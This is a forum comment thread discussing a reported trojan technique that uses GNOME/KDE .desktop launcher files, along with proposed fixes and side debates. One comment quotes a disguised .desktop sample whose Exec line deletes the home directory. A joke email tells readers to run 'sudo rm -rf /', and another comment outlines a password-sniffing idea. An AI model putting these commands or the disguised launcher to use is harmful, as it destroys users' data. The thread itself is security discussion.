That would require a blacklist of script interpreters, which could only be a temporary solution. No blacklist is ever going to cover all possible attack vectors. Similarly, checking for particular parameter length will either have too many false positives or fail to catch potential attacks. E.g., what if the command was /bin/rm and the parameters were "-rf /"?

Requiring the executable bit would make for a more permanent solution to the problem.

Re:Protect your self with encryption

[kcbanner]

Ok, I'm not sure how that would fix it though, I mean if you make them into scripts then wouldn't that be an even easier way to attack? Unless you mean that they are always displayed to the user until they set the +x themselves? I'm sure I'm missing the point here though, its early (and no coffee).

Re:Protect your self with encryption

[Ed+Avis]

Yeah it's pretty straightforward: if the executable bit is not set then the file is merely *displayed* as a plain text file. If the executable bit is set then it is *run*.

That means you cannot simply save an attachment from a message and run it. You can however display it, which is fine.

Everything works like this except for .desktop files, which because of an oversight, default to *running* on double-click even if not marked executable. Hence the attack vector. It is made nastier by the fact that .desktop files can disguise themselves with a name and icon of their choosing.

Re:Protect your self with encryption

[kcbanner]

Ah. Gotcha.

Lame

[DesertBlade]

It is the equivalent of downloading a Picture.jpg.bat that deletes *.* from windows. Windows hides the extension (.bat) so it would be easy to double click on it and bam no more files. Yes the icon would look different.

I have previews turned on in Gnome so I can actually see the picture before I run the code.

Re:Lame

[EaglemanBSA]

Lame indeed! This basically exploits the fact that you can easily write and execute code - find me an operating system where you can't do this.

The whole scheme hinges on the user being an idiot in terms of what they open in their email - seems to me there's little in the way of guarding against such 'vulnerabilities'...build a more idiot-proof system and the world will build a bigger idiot.

Re:Protect your self with encryption

[blue+trane]

Nah, you don't speak for me.

Re:Stay away from root

[emocomputerjock]

Data theft is much more nefarious and dangerous than data destruction and usually the primary goal of anyone attempting to exploit a system. Backups are great, but using personal data for financial gain is the name of the game nowadays.

from the article

[tajmorton]

[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=rm -rf $HOME
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Oops... you had backups of all your data, didn't you?

The article has an example of an entry that downloads code off a server and executes it instead.

Re:from the article

[DesertBlade]

Agreed it is doable, but it is unlikely unless the person targets the user. It is different for GNOME versus KDE.

Re:Stay away from root

[Creepy+Crawler]

We linux gamers already do exactly that.

Gnome, KDE, and other environments take up too much resources, so we start a Xterm. Then we proceed to launch the game via Wine.

Games run smoother in Linux via Wine than they do on the same hardware with Windows.

Re:Stay away from root

[Who+Is+The+Drizzle]

If one user's data is compromised however, the system is still OK, and other users' data too.

Who else would be having data on a single user system (aka most people's desktops)?

Fast fix

[Todd+Knarr]

Fast, simple fix for this: make .desktop files scripts. Start them with "#!/usr/bin/false" or something so that if just executed from the command line they don't do anything, just fail. Gnome and KDE expect all entries to start with that and be executable. If they're executable, they act normally. If they aren't executable, the contents or their properties are displayed instead. If they don't start with the hash-bang line, the interface prompts the user for whether they want to display or execute the entry.

A fancy elaboration could register a binary-format handler (similar to the one Wine registers) that would recognize the "[Desktop Entry]" starting the file as a binary format and, if the file was executable, trigger the interface to act on the entry. That could remove the need for the hash-bang first line, but there's some other potential holes I'd have to analyze for impact.

Re:Fast fix

[JesseMcDonald]

Why not just make a proper interpreter for .desktop files, and use that in the first line ("#!/usr/bin/desktop-launcher")? Then the DEs could always run executable files, and always display non-executable files. As a bonus, you could run launchers from the command-line.

Re:Fast fix

[Todd+Knarr]

Because you want them to be do-nothing files when you aren't running in a DE (eg. logging in from a text-mode console or via SSH). Or at least that's MHO.

Re:Fast fix

[spitzak]

Why? If whatever the .desktop file will do does not work when running under ssh, then it will fail to run. And I can quite well imagine .desktop files that do something useful when run under ssh, or that detect this and do something different and correct.

Therefore I certainly agree with previous poster that it should #! some "run a .desktop file" program.

This solution does sound like it will help with the problem. However it is not clear how to ever fix this if any kind of installer exists that can turn on the -x bit. And without such an installer it is going to be very difficult to install software on Linux.

Re:Fast fix

[JesseMcDonald]

However it is not clear how to ever fix this if any kind of installer exists that can turn on the -x bit.

Why is that? If a .desktop file is to be created by an installer, you'd want it to set the execute bit. This is for protection against files created by programs which aren't intended to install software, such as e-mail clients, web browsers, and archive extractors. Such programs should never set the execute bit by default.

Re:Fast fix

[Todd+Knarr]

It's not meant to stop installers from setting the execute bit. They're supposed to do that. It's to stop .desktop files not put in place by an installer (eg. from a saved e-mail attachment) from being treated as executable without additional user intervention.

NB: installers sent as e-mail attachments are already protected this way, when you save them they end up without execute permissions and won't run until the user sets the execute bit manually.

You are wrong

[SmallFurryCreature]

I am dealing with a user at the moment who just isn't that bright. It is not that she is a moron, she just doesn't think. Somethings she does right, she gets her wallpapers through googles image search and uses firefox after my suggestion.

But she also wants animated cursors and finds them and happily installes them. Cursor Mania.

She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?

The problem is not so much that some people are stupid but that they lack a healthy dose of cynasism, they forget to question things. And that is pretty to stupid.

The system can't protect against this unless you want to life in the nanny state. Women are free to go with convicted wife-beaters unless you want the state to decide your partner for you. People can install spyware unless you want the system to decide what you can install.

For some reason people like you want software to do things you would NEVER accept in hardware. Would you really want a powerdrill that constantly checked wether you where drilling in the factory approved substances, at the right angled, under the right conditions? A screwdriver that refuses to be used as a hammer?

At some point users must accept a responsibilty to operate their equipment responsible themselves and accept that if they make mistakes, they are the ones to blaim.

You know what my solution has been to fix 99% of friends requests to fix their windows PC? Re-install. Whipe the crap and sooner or later they either figure out that "mmm once I downloaded those free smiley's my computer starts to act like a piece of crap, maybe these two things are connected" or at least find someone else to help with their crap PC's.

Lets face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.

Re:You are wrong

[Ed+Avis]

What you say is all true but it's not relevant to this particular problem, which is that *all* users, even sensible and cautious ones, can be easily tricked into running an executable because the user interface makes it look exactly like an ordinary file. You or I would also be vulnerable.

And BTW, I suggest you kiss her first, and fix the laptop afterwards.

Re:You are wrong

[javilon]

Lets face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.

It seems to me that while they are a bit slow with technology you, on the other hand, are a bit slow at making the (lack of) connection between "fixing laptop" and "getting laid" when social interaction is the issue.

Re:You are wrong

[erikina]

But she also wants animated cursors and finds them and happily installes them. Cursor Mania.

She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?

I had exactly one of these sort of people needing to borrow my (linux) computer the other day. A couple hours later I get back and on the desktop there's a couple extra files on my desktop like wallpapers.exe and the like. I really couldn't help but chuckle. I guess security through obscurity works for stupid users. :P

The problem is not so much that some people are stupid but that they lack a healthy dose of cynasism, they forget to question things. And that is pretty to stupid.

Eh. I've had enough of these cynic people. Such as "This software isn't free. I might not be into the whole computer scene, but trust me on this one, there's going to be a catch. The only thing that is free is the dirt under your fingernails" or the "If it's free it's crap".

And it's really not cynicism either. Is it really hard to believe that an entire operating system or browser or pdf reader (or any other of the dozens of other software) is completely free, while a pack of cursors isn't?

People just lack sufficient knowledge, and often motivation to learn about it. (and there's a large experience element).

The system can't protect against this unless you want to life in the nanny state. Women are free to go with convicted wife-beaters unless you want the state to decide your partner for you. People can install spyware unless you want the system to decide what you can install.

For some reason people like you want software to do things you would NEVER accept in hardware. Would you really want a powerdrill that constantly checked wether you where drilling in the factory approved substances, at the right angled, under the right conditions? A screwdriver that refuses to be used as a hammer?

There's quite a difference. Most people don't know, and don't care how software works. So anything that protects them like that is a good-idea. Perhaps a better equivalent is a (2 stroke) lawn mower that makes sure you've mixed the right amount of oil in the fuel.

At some point users must accept a responsibilty to operate their equipment responsible themselves and accept that if they make mistakes, they are the ones to blaim.

It's easier to blame the complexity of computer or virus makers and come up with "legal solutions" to malware.

You know what my solution has been to fix 99% of friends requests to fix their windows PC? Re-install. Whipe the crap and

Stop there. I say that's about 50% of the work, and time to get payment before the other 50%. ;P

sooner or later they either figure out that "mmm once I downloaded those free smiley's my computer starts to act like a piece of crap, maybe these two things are connected"

Hahhaa. Has that actually ever happened? ever?

or at least find someone else to help with their crap PC's.

My solution of choice too. It also guarantees removal of all the crap and it's a lot easier for me.

I used to push Linux, but soon realized that it just means hours of unpaid support and people trying to do things that linux doesn't support. (Which invariably leads to adding a Windows VM, which even conceptually (moving files, device interaction etc.) is too difficult for the average user. (especially when they previously just had Windows)

Re:You are wrong

[McDutchie]

She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?

I think I would try that by explaining the difference between free as in freedom and free as in "we will sell your soul to our advertisers".

Re:You are wrong

[cas2000]

The system can't protect against this unless you want to life in the nanny state. Women are free to go with convicted wife-beaters unless you want the state to decide your partner for you. People can install spyware unless you want the system to decide what you can install.

true, the state can't decide those things for individuals.

however, the state can prosecute wife-beaters for assault, rape, murder, and any other crimes they may have committed.

similarly, the state can prosecute spyware vendors for fraud, deception, false-advertising and/or misrepresentation, unauthorised access to a computer, infringement of privacy, and other crimes.

Re:You are wrong

[jonadab]

> *all* users, even sensible and cautious ones, can be easily tricked into running
> an executable because the user interface makes it look exactly like an ordinary file.

No, not all users. Only users who deliberately save random unidentified garbage, and not only that but save it to their desktop, of all places, and then go along happily click-click-clicking all over it. In other words, people who are just plain not bright enough to be trusted with a complex task such as operating a computer.

I will grant you that .desktop files are an inherently bad idea, because there *ARE* a lot of users out there who fit the above description. But saying that all users would be infected, including sensible and cautious ones, is just plain idiotic. Users who practice safe and sane computing have absolutely nothing to fear from this, unless there's some kind of attack vector whereby an attacker can cause a malicious .desktop file to be saved to the user's desktop (or menus, or wherever), and frankly, if an attacker can cause arbitrary content to be written to your drive, then you've got much bigger problems than the .desktop files.

Re:You are wrong

[Logic+Worshiper]

You're doing it wrong. Treat her like a lady. Don't ask for sexual favours in exchange for fixing the laptop (major turn off), just bring a bottle of wine and Chinese take out, or order Pizza and beer. Don't make her feel like a prostitute in a business transaction.

Re:You are wrong

[Eli+Gottlieb]

The trick is to A) be marginally physically fit, B) have social skills and charm, C) help a girl with her laptop out of genuine altruism, and D) actually realize that she's started to like you and ask her out.

Don't worry, I failed at D, so you don't have to revoke my geek card.

Re:You are wrong

[TuringTest]

Except that your definition of "safe and sane" throws away everything about "convenient and usable". If users should stop using the desktop for its original intended use (you know, saving unidentified temporary stuff) only because it brings security concerns, that is a failure in the implementation of security in the desktop, not the behaviour of the user.

Re:You are wrong

[Ed+Avis]

One question: how do you ssh in to someone's PC if they are behind IP masquerading and have a dynamically assigned IP address? I know there are ways to do it but I wonder if there is one that works out of the box on Fedora.

Re:You are wrong

[Alex+Belits]

Tell them to run

ssh -fNR127.0.0.1:2200:127.0.0.1:22 their.username@some.server.where.they.have.an.account

(or have a script with it)

Re:You are wrong

[Ozzie000]

It is not that she is a moron, she just doesn't think.

You hit the nail on the head there.

Not a virus?

[pyrr]

I noticed in the TFA that the author claimed that some folks were claiming this didn't meet the definition of 'virus'. It's funny how the definition seems to have changed. I'd have to say this sort of exploit is technically an old-school virus, the sort that is pretty much dependent on a gullible end user to do something stupid, at which point it could dig-in its tentacles. Most modern Windows viruses, including the fake-anti-malware malware that seems to be going around lately, don't require any user interaction whatsoever to get infected.

When I think of a "virus", well, that's just malicious code, it's something designed to do some form of damage. It's malware-- software that's up to no good. That doesn't describe the delivery method.

I can see how folks want to draw a distinction based on the severity of the exploit (namely the extent of the potential damage to the system and the level of user interaction), but claiming this isn't a real virus is just silly. Maybe a new definition for the more severe sorts of malware is needed.

Re:Not a virus?

[SwashbucklingCowboy]

Most modern Windows viruses, including the fake-anti-malware malware that seems to be going around lately, don't require any user interaction whatsoever to get infected.

Then they likely aren't viruses, but other things such as worms.

Re:Not a virus?

[mmell]

Hmmm - claims to be something it's not, relies on the user to bring it "inside the city walls" so to speak . . .

Sounds like a Trojan Horse to me. If you don't like that word, you can stick with "malware". But you're right - it isn't a virus. Computer virii act against a weakness of the target system, not the target system's user; and virii spread and reproduce as part of their life cycle.

Trojan Horse.

Re:Not a virus?

[99BottlesOfBeerInMyF]

• Trojan - malware poses as something it is not and is run by the user, sometimes unintentionally.
• Virus - malware that infects other software and spreads when that software is run.
• Worm - malware that spreads itself automatically without the user explicitly running it.

When I think of a "virus", well, that's just malicious code, it's something designed to do some form of damage. It's malware-- software that's up to no good. That doesn't describe the delivery method.

Viruses have always had specific characteristics to distinguish them from other malware. People who did not know anything about malware, however, often use the terms malware and virus interchangeably, largely due to poor distinction in media. Virus absolutely implies the method of delivery. It is likening code to a biological organism that behaves the same way. Calling this a virus is like calling a generic toxin a virus in biology.

I can see how folks want to draw a distinction based on the severity of the exploit

That has nothing to do with it.

Re:Not a virus?

[99BottlesOfBeerInMyF]

And there aren't Linux viruses(and hardly Windows anymore) because people don't share executables and disks like they did in the 90s.

Actually there have been recent instances with thumb drives, mp3 players, and even CDs and DVDs burned and shipped with viruses.

Now when the malware gets access to your software it already has root and couldn't care less about infecting your binaries. It will send more trojans and keep spreading that way.

Yeah, worms are certainly prolific, although the most prolific ones (by number of infections) don't use trojans but use exploits with no user interaction component.

Re:Not a virus?

[cas2000]

your own personal idiosyncratic definition is both irrelevant and wrong.

what the article describes is a trojan, not a virus. it requires the user to manually execute it. such malicious programs have been called trojans (short for "trojan horse", a term that has been in common use for centuries, if not millenia - a reference to the iliad and the cleverness of odysseus in social-engineering the fall of troy) since at least the early 1970s.

the thing that distinguishes a virus from a trojan is that a virus is malware that can self-propagate by misusing the resources of a host that it has already infected - i.e. it can infect other machines *without* requiring a user to take specific action to execute it. it's called a "virus" or "computer virus" as a direct analogy to biological viruses.

to over-extend the analogy:

a cup of hemlock, poison, could be a trojan (esp. if someone was tricked - social engineering - into drinking it), while a disease such as hepatitis is caused by a virus, an infectious biological agent that invades cells and hijacks their reproductive apparatus to create more copies of itself - which then spread out to invade other cells and repeat the process.

BTW, by your erroneous definition, format or mkfs are "viruses" because they can do damage if misused. they're not. they're not even trojans because their intended purpose is to be a useful utility, not to cause harm.

This wouldn't be that hard to fix...

[nukem996]

Two ways to fix this off the top of my head.

1. Create some way to register .desktop files. Only .desktop files registered will be executable.
2. White list all .desktop files in /usr/share.. and any place else apps store their .desktop files system wide. This way they can be executed without a problem since the user shouldn't have write access to that anyway. For all other .desktop files(such as ones in the users home directory) add another parameter which contains the systems signature. If the signature doesn't match the current systems signature don't execute it.

Securety of OS files vs personal files

[Lord+Lode]

If I'd be attacked by a virus, my concern would be my personal files, not the OS files. An OS can be reinstalled, personal files not. In non-root mode, ANY program can access my personal files, email them, upload them, delete them, mutilate them, etc... I think the only thing that can protect against that is to only run executables and scripts that come from a source you know is safe. But if the repositories would be hacked, then even that source isn't safe!

Re:Securety of OS files vs personal files

[Hatta]

In non-root mode, ANY program can access my personal files, email them, upload them, delete them, mutilate them, etc...

Not true. Only programs run as your user can access your personal files, assuming you have sane permissions set.

But if the repositories would be hacked, then even that source isn't safe!

That's what package signatures are for.

Re:Securety of OS files vs personal files

[Lord+Lode]

Ok, by non-root mode I meant my user. Which is what I'm running as, and who launches the script or executable. Who did you think I mean by non-root?

Dumb question related to OS X

[Enahs]

Could the respective desktops be set up to prompt the user before a .desktop entry is opened for the first time, a la OS X's behavior when launching apps?

Re:Dumb question related to OS X

[jrothwell97]

It depends. OS X's application architecture is vastly different, as the apps are self-contained bundles. If you copy it into /Applications, it's automatically granted permission IIRC to do whatever it likes in the home folder. If you're running it, say, from an external hard drive, then it asks your permission, because it may not have been consciously installed.

I doubt this could work in most Linux distros, as very few of them provide the applications as self-contained bundles. There are also so many commands (mkdir, rm, et al) that are difficult to differentiate from, say, Firefox, or even (god forbid) BadlyDisguisedMalware.out.

Re:Dumb question related to OS X

[edalytical]

On OS X you are always asked before a downloaded file is opened. This holds true for documents and application. Moving the file does not change the behavior. You can drag the application to the /Applications folder and you'll still be prompted.

Malware threat GNOME to KDE

[DanielG42]

I misread the topic and was really scared for a moment there.

Leave my desktop choice alone you evil malware writers!

Stop making Linux into Windows

[DoktorSeven]

The real solution, of course, is to stop using stupid Windows-copycat methods for launching programs for the sake of "ease of use".

The more Linux tries to copy Windows (dbus, hald, .desktop, etc), the more insecure it will get.

Re:but wait....

[Teun]

Plus downloads still default to the existing Desktop directory which is easily accessible via any file manager.

Re:Stay away from root

[JasterBobaMereel]

You can lose your data by
    A bad drive
    Accident (Delete, whoops... )
    Your system becoming unusable
    Malware deleting files

This is what backups are for .... if your system is still running and free from malware (now) you can just restore the backup, in a few moments

If the malware runs as root then it's a case of reinstall from the ground up then restore all of the the backup ...(Windows default)

   

Re:Protect your self with encryption

[nicodoggie]

This solution might be the only practical one, but, the thing is, once we draw in much of the Windows crowd, most of them wouldn't know how an execute bit is set (easily remedied by some googling) and why it's important that it's disabled by default.

Most of them would be trolling bug trackers with "My desktop shortcut doesn't work right", etc.

A dialog could appear on whenever a user tries to use a .desktop file for the first time that gives them an option to set the execute bit and some ominous text that briefly explains what it may mean—though the same set of people tend to click the Yes/Ok/InstallMyMalware button without reading.

Maybe Linux should keep its learning curve moderately-high as a security feature?

Re:Stay away from root

[godrik]

Well, this is not sufficient. Once I can run scripts from your main user account, how many time will it take to the next time you enter your root password (or the user's password with sudo) ?

It is easy to write some script that wait for su, sudo, gksudo to be launched and then read the keyboard as you type your password. I recall that any process can read all the X event of the same user's process

The same old advice as before apply. Use one account to do only administrative tasks (ie, accessing root privilege) and one account to do what you do with your computer

BTW, there is also some binaries that need to be launched SUID. There can always be some flaws in them.

Re:Does not work as advertised

[scientus]

you miss the point, it doesnt need the execute bit, nor does it need to have execute as the default, .desktop files are this special type of file that while really being a interpreted language in of itsself is not classed as such.

When a program opens rather than executes (as a interpreter) a file it should never allow that file to execute any code, if it fails this it is effect an intrepreter, .desktop files should be fixed to not run arbitrary commands (hard), should have forced ownership by root (stupid), or should be classed as what they are, scripts intrepreted by the DE.

btw apples whole package system works like this, OSX does this exact thing by design with its .app folders, of course they do need execute bits set to the best of my knowledge, and that is one of the reasons they need an image format.

Re:Stay away from root

[PitaBred]

Virus authors rarely want to cause damage. And if they do, it's quickly caught. What's more common is trying to run things under the radar so that you can profit from it. And without root privileges you cannot run servers on privileged ports and so on, so it's still much less of a danger. It can still blast out information, but hey, so can any program. The only thing to worry about are "ransom" type programs which encrypt data and force you to pay for the password to decrypt it. And those are very uncommon.

I'm not saying .desktop files should be executable by default. I think there needs to be a mechanism keeping them from doing so, perhaps not allowing them to execute any files that aren't owned by root. That should solve most of the issues.

Re:Does not work as advertised

[scientus]

same, you read all the RTFA comments, and therefore have read the article.

Re:Stay away from root

[scientus]

having a CoW filesystem would help with this alot, although i admit this is a stupid problem those .desktop people got us into.

Re:Stay away from root

[scientus]

for some people simply the remote access of their data is just as important

This is not a Linux vulnerability

[Pictish+Prince]

I always use the fvwm2 window manager - it works quickly the way I want it to. kde & gnome (enlightenment too, for that matter) are just bloatware that slow down your system and are security holes. Why anyone would use them is beyond me.

Regarding the title.

[jetsfandb]

FTA:

A more accurate title for this email therefore might have been: How to write a Gnome/KDE virus in 5 easy steps. But since Gnome and KDE are predominantly used under Linux, I feel that a virus based on those vulnerabilities would impact Linux users the most. Thus, the chosen title remains valid.

I disagree.

Calling the method a Linux virus just because it would affect a large number of Linux installations is entirely invalid and irresponsible.

With the misinformation already in existence, coupled with some companies active campaigns to create further misconceptions, the last thing Linux needs is an article implying that it contains a vulnerability when it does not.

The problem begins and ends with both desktops as should be the solution.

Sorry, but you don't get to extend the issue to Linux just because its a very large percentage of the KDE/Gnome users and the title sounds more dramatic when you say Linux instead of KDE/Gnome.

Not PEBKAC

[TheLink]

A lot of people claim it's a PEBKAC problem, but I STRONGLY disagree.

If you expect people to figure out whether a file is safe before "launching/opening" it, then you are expecting people to solve something arguably harder than the "halting problem" (which I hear is very hard, but still easier in comparison since you are given both the description of the program AND the finite input!).

I propose that:
1) Compliant programs be allowed to _request_ what they want to be able to do (by either using a finite and manageable set of standard sandbox templates, or in special cases a custom sandbox template - which can be audited and digitally signed by 3rd parties).
AND THEN
2a) The user be asked whether the request seems reasonable e.g. Fun Screensaver requests "Standard Screen Saver" privileges vs WARNING!! Fun Screensaver is requesting "Full System" privileges!
AND THEN
3) If approved, the operating system then enforces the requested template, so the program can only do whatever possible within the template sandbox.

Do note there's also:
2b) The request is silently approved if the OS has been told to remember the user's prior approval of the program and template (and the alt/whatever key was not held down while launching).
2c) The request is silently approved if the program and requested template is signed by trusted parties (e.g. OS vendor), and the alt/whatever key was not held down while launching.

I have proposed this concept before to Ubuntu and Suse, see:
https://bugs.launchpad.net/ubuntu/+bug/156693
(FWIW I've actually also suggested this to apple).

It'll be hard to implement, but I suspect it's easier than getting "Joe Sixpack" to reliably solve something harder than the "halting problem".

Lastly, much windows malware REQUIRE a brain to participate in order to spread. It's often harder to write malware that does not require a brain to spread. Many here think they're so smart, but would they really know what a devious binary or perl script actually does? Have they ever looked at the Underhanded C entries?

Re:Not PEBKAC

[TheLink]

While Vista does sandboxing AFAIK it doesn't have templates for sandboxing (which to me are an important part for making them user manageable).

Does it provide the user with an accurate concise idea of what the program's required privileges are?
Does it allow the user to save the decision preferences for an app+template pair?

Vista's UAC as implemented seems more like a way for Microsoft to shift blame to the user for security problems.

Re:Not PEBKAC

[xenocide2]

Can someone explain why it's acceptable to describe users as "Joe Sixpack"?

Re:Not PEBKAC

[Autonom]

Maybe you could create a fork of Ubuntu and call it NagOS. 'Mr. Malware... leggo my Nagos.' Why do you expect the Ubuntu devs to make the same mistake as the Vista devs did. Wasting energy on creating nags for every instance where a users security may be threatened is not the solution. 1. Because, if an exploit is discovered to circumvent this feature or it is missing from some programs or components in the system, the user will assume everything is good. 2. Because the malware itself can be created to mimic this type of protection. Just look up MS Antivirus on wikipedia and you'll see what I mean. Malware exploits will continue to be an issue as long as people continue to be ill-informed and make bad decisions about computing. This falls under the Moore's Law of computer security, "Make a better security system and we'll make a better idiot." OS should be expected to plug any backdoors, but user level should be managed by the users.

Re:Not PEBKAC

[Logic+and+Reason]

We're already partway there with standard user permissions: as long as you're not running as root/Administrator, malicious or buggy software can't mess with your system files without your permission.

Of course, this doesn't prevent, say, an installer that otherwise legitimately neeeds administrator priviliges from accidentally erasing your hard drive. And besides, users' most important files are usually the ones they create themselves-- files to which any apps they run will have complete access!

SELinux is one solution, but it's way too technical for the average user. More academically, there are capability-based systems like Coyotos (recently discussed as a possible replacement kernel for GNU Hurd-- stop snickering back there!).

Anyway, I agree with you that we need this, but doing it in a user-friendly way is a hard problem. And it needs to be very user-friendly, because people generally don't understand or value security very much and therefore have a low tolerance for security-related annoyances.

Re:Not PEBKAC

[chgros]

which I hear is very hard, but still easier in comparison since you are given both the description of the program AND the finite input!
In case you don't know, solving the halting problem is not just very hard, it's impossible.

Re:Not PEBKAC

[gbarules2999]

If it's good enough for Palin, it's good enough for Slashdot.

Re:Not PEBKAC

[Arterion]

Would you prefer "Joe Fourty Ounce"?

Re:Not PEBKAC

[Eskarel]

Actually it's not what Vista does. Vista says "application X is either requesting system access, or appears as if it might request system access do you want to grant it".

It doesn't allow you to define which types of system access you want it to have(I might want my screensaver installer to be able to access the settings which allow it to set the screensaver I just installed as my default screensaver, but not to arbitrarily execute code or access other system settings for instance), nor does it allow you to provide long term approval for known applications.

UAC is a massive improvement over the old system(it allows users to elevate permissions simply on demand), but it's got a whole bunch of flaws and isn't this system.

Re:Not PEBKAC

[cas2000]

Because "Jane Sixpack" would be sexist.

Re:Not PEBKAC

[jonadab]

> If you expect people to figure out whether a file is safe before "launching/opening" it,
> then you are expecting people to solve something arguably harder than the "halting problem"

I think you've overstated that somewhat. If it came as an attachment to an email message, and you were not expecting to receive it, and you don't know what it is, and it's an _executable_ filetype, you generally don't need to know any more about it than that. Send it to /dev/null and have done.

Re:Not PEBKAC

[TheLink]

Right, but it is a simpler problem than figuring out whether a program is safe to run before running it -without knowing all of it's possible inputs. The typical user is also usually unable to understand the true description of it - the object code.

My suggestion is analogous to a "halting problem" program telling the user (and O/S) in advance that it wants to run for a max of "a short while" (in human terms). And so the O/S limits it to 30 seconds, and if the program tries to run for longer, the O/S kills it.

Whereas if a "halting problem" program that is expected to run for a "short while" by the user, told the user that it wants to run "forever", the user might get suspicious and refuse.

It would be easier to train users to refuse "forever" requests - and/or contact an expert for advice.

Re:Not PEBKAC

[TheLink]

You appear to not have read or understood my post.

Nags? See 2b). If you have to evaluate and install 100 different programs a day, you will get 100 extra dialogs and make 100 extra decisions, but with my proposed system you are more likely to still have an unpwned computer by the end of the week.

The malware can only mimic this type of protection AFTER it is allowed to run and has been given the necessary permissions to mimic it.

They won't listen

[diegocgteleline.es]

I filed a bug warning of this security problem on March, 2005. Final answer of the developers after taking it to the freedesktop lists: WONTFIX. So, what's the point of reporting bugs?...

The fix is easy, only interpret .desktop files IFF they have the +x bit set (IOW, apply the regular UNIX semantics). It shouldn't take more than a few lines in Gnome and KDE to fix it, and distros can easily modify the scripts to make all the .desktop files +x-

Re:They won't listen

[Truekaiser]

I don't know if you got the point of my post. It was a method to fix the problem of them not willing to fix the hole. Seems to me they won't fix it until it gets exploited or they are bugged to do it. Preferably both.

Re:They won't listen

[Thinboy00]

Well... file a God-bug. That should fix it!

Re:They won't listen

[Eskarel]

Well that's not actually a fix. If you're getting the file there by social engineering you can quite easily get the user to set permissions on the file to allow execution(you've already convinced them to download it haven't you).

If you've found a vulnerability allowing you to put the file there without user intervention, then you can easily change the permissions at the same time.

Re:They won't listen

[Eli+Gottlieb]

The only solution to social engineering of the user is to have a more knowledgeable system administrator. This just ups the ante on the social engineering.

No system can defeat social engineering.

Re:They won't listen

[tkinnun0]

No system can defeat social engineering.

How about a system which has no humans in it?

troll; trojan not virus

[Eil]

I've been following this for the last couple of weeks and here's all you need to take away from it without actually RTFA:

1. The article describes how to write a trojan. Not a virus. A virus exploits security vulnerabilities in software to spread itself. A trojan exploits security vulnerabilities in humans to spread itself. Measures can always be implemented to defend against the former. No software written will ever ever prevent the latter.

2. The article is basically one giant inflammatory troll relying entirely on a deep and confused misunderstanding of point #1 to justify its conclusion that Linux is insecure. The whole point of the article was to generate a huge backlash and drive traffic to the blog, much like the modus operandi of the Linux Haters Blog or whatever it was called.

In summary: don't feed the trolls, kids.

Re:troll; trojan not virus

[Eil]

I've been following this for the last couple of weeks

Edit: I meant to say, "I've been following this for the last week".

Dang kids and their newfangled Preview button...

In one easy step:

[140Mandak262Jamuna]

Subject: Open Source virus.

Dear Email user

You have just recieved an open source virus email. Please forward this mail to everyone in your .mailrc and run the command sudo \rm -rf /

Thank you.

Re:In one easy step:

[__aasqbs9791]

Isn't that two steps really? One to fwd, and one to run a command?

Re:Stay away from root

[lord_sarpedon]

I've been saying that for a long time. People are living in a fairy land right now as far as any desktop OS being 'more secure.'

Would I trust a default Ubuntu install over Windows? Yes.

Does the Ubuntu kernel turn on the NX bit on 32bit? No.
Can users inadvertently run something which will take them from behind? Yes.
Will more marketshare soon lead to legions of zombie Linux desktop machines? Certainly.
Are the above three points excusable? I think not.

Re:Stay away from root

[csartanis]

Sure last month I made a backup. What about my last 29 days worth of data?

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Protect your self with encryption

[JesseMcDonald]

The programs responsible for creating .desktop files would set the execute bit automatically, so the change should be more or less invisible. The only case where you'd have a non-executable .desktop file would be if it was saved from a program which does not normally create shortcuts: an e-mail attachment, something downloaded from a web site, etc.

Re:Protect your self with encryption

[bmorton]

A dialog could appear on whenever a user tries to use a .desktop file for the first time that gives them an option to set the execute bit and some ominous text that briefly explains what it may meanâ"though the same set of people tend to click the Yes/Ok/InstallMyMalware button without reading.

I can scarcely imagine something more annoying. It's also totally unnecessary. A shortcut explicitly created by a user would be given execute. A downloaded shortcut would not have it. Like anything else in *nix.

How to get a million dollars and not pay taxes

[vegaspctech]

First, get a million dollars... If you can get the user to download and open your attachment it doesn't matter which platform is involved, you've got them.

Re:The Microsoft Solution

[CommentThingSucks]

Windows will, however, warn you that the .lnk file can be potentially dangerous when you try to run it, just like with executables downloaded from the net.

Whether anyone bothers to click Cancel on the warning is a different matter though.

Re:This should be a top priority

[spitzak]

The mail client is not running the desktop file. Instead the mail client is saving the desktop file, and then the user is double-clicking it directly.

Morale of the story

[Patch86]

Be careful when you're on the internet, regardless of the operating system.

The gist of TFA is that it's still possible to deliver malware to a GNOME/KDE user through simplest of attack vectors- getting a user to execute a program or open a strange file. TFA makes a point of noting that "a few extra steps" are required to write Linux malware over Windows. Its not so much of a "Linux vulnerability" as an "almost all modern GUI vulnerability" which Linux can be afflicted with too. GNOME/KDE have decided that the fix would hit their functionality too hard to be worth fixing (while others, like XFCE, decided contrary), and similar arguments apply to most of Windows' vulnerable vectors too.

If you download an execute malware, theres not much an OS can do to save you. It's unfortunate, but true.

Linux viruses ...

[janwedekind]

... are always open source.

Maybe its not that bad

[jesusflores]

So you say that an user gets infected because he opened and launched an unidentified python/shell/etc.. script? Well, he probably will have a problem and will learn a valuable lesson, one that applies to every computer system, be cautious with what you execute on your computer. It's some kind of natural selection, don't you think?

Re:Stay away from root

[Techman83]

So would a hard disk failure. Backups are still important when running *nix

help help its so bad

[greenarrow7]

Them Linuxez has been hacked! I'm not going to go to sleep until all of my hard disks are formatted and windows 7 is running on all them internetz! I hear in windows 7 is better cos it doesn't let you open files to protect you from them virusez.

disable filesave for files "*.desktop$"

[keneng]

Long-term solution:
--------------------
1)Add plug-ins for idiots to disable saving files ending with ".desktop" from thunderbird and firefox.
2)Also, don't make the default saving directory ~/Desktop.
3)Never double click item icons. Always right-mouse button click and choose the "Open with..." item when opening. In fact, this has been the default behaviour in Microsoft IE for unrecognized formats. Well, let's just make it our default even for the recognized formats. It's a little work for the user, but it prevents from opening a virus.

Interim Solution:
-----------------
